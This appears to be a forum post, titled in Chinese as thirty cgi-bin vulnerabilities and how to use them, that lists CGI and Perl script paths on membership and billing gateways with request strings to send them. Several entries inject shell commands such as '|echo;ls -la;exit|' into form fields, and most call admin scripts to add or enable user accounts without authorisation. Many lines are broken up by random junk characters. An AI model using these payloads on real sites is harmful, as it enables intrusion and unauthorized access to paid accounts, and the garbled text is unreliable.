Cgi-bin 30个漏洞＋使用方法

admin

==============================

# i. ?$ f9 G3 U4 s: F. h/smspass.pl
username=username&password=password
! n( ]+ I: o& l) e: x8 F8 d- O2 p, A
# }' U: }0 e/ B" [$ L. S" R5 |/index.cgi
% x3 M( `  T" N* Rwei=ren&gen=command
6 G% L, t3 w9 S- M" u) J8 _
/passmaster.cgi
Action=Add&Username=Username&Password=Password
" f  p! S. b8 m+ M4 j
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
: W0 |- H0 L: U3 [
7 L; [# U6 f8 U/ R/form.cgi
, c$ a$ i) y; y! |# C) Z# d" N8 ~7 Tname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
' l4 I+ Y1 [) P- @9 X, c4 X/cgi-bin/EuroDebit/addusr.pl
+ o" I( j/ D3 `. F/ Wuser=username&pass=Password&confirm=Password
. ]1 z% I" d8 k& W- }0 g* w
/ccbill-local.asp
9 s# U2 h& V! N' v  {* b0 wpost_values=username:password
+ g; N9 [8 m9 V- P3 `# u- [
/count.cgi
pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
: D: `" F0 d, T  r% p- msearchoption=1&searchfor=|echo;ls -al;exit|

' V1 B5 t. j; t; s$ g/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

" m. M& c3 i/ ]: V/af.cgi
_browser_out=|echo;ls -la;exit;|
0 O) k( F7 w5 _
; D7 N) t# b; X" I8 z9 s  N/modify.cgi
+ }; D/ |5 ~; i% ~3 Pusername=username&password=password&expire=30
2 L/ z& Y8 ]3 p- s/ o# A7 ?
; t6 b- h! I( l7 o' n% x/openjournal.cgi
0 Q4 c; m  S4 D& q* x+ R& Vedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
& s# r" k* U% p. S8 c1 Jcmd=ADD&user=username&pass=password

/probecontrol.cgi
5 D& X$ g7 B2 J* `7 fcommand=enable&username=username&password=password

/recon.cgi
7 S( ]' p1 `1 ysearchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
* A7 a+ G1 h0 U7 k# z, icmd=ADD&user=username&pass=password
# k' C+ t' ]( S' v/ H
: l# H& f% |0 N7 L/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
, I# z6 i4 h- u. l% Ucommand=add_member&username=username(EMAIL)&password=password(DES)
( {( O- j& a8 m- o: _* x
2 Z+ d4 F  R& ~+ ?- x- O' X/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

/usercontrol.cgi
command=enable&username=USER&password=PASS

! d' U( ~$ R  k  f' X, H7 q/globoSALErum.cgi
2 Y7 u/ G- L& f* _action=ADD&seccode=seccode&login=username&password=password

, J0 E: J) d- o/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
5 r) l3 d" x0 C# t9 N0 W0 I' G/cgi-bin/mastergate/pincount.cgi
2 Z$ w0 \6 U2 D4 S6 e2 x* gpinfile=|echo;pwd;exit|
; k* k+ D5 L' n# h' P
/accountcreate.cgi
0 |7 L) Y# }5 d! C/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

) C3 E, v" o) E; f/af.cgi
/env.cgi
ADD+;echo;pwd;exit
6 }  a5 r; s3 l+ e
/ {+ E1 d, I6 Z3 n; ?/count.cgi
pinfile=|echo;pwd;exit|
  y4 T7 z, p4 V* O# _3 F
+ w, S, N' N, N3 \& X  f/ G/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
2 @* p5 I& b- Y. H) D! M  Dusername=username&password=password&expire=30

==============================
% X( s  C  P/ t) t1 n: M; E/ l, o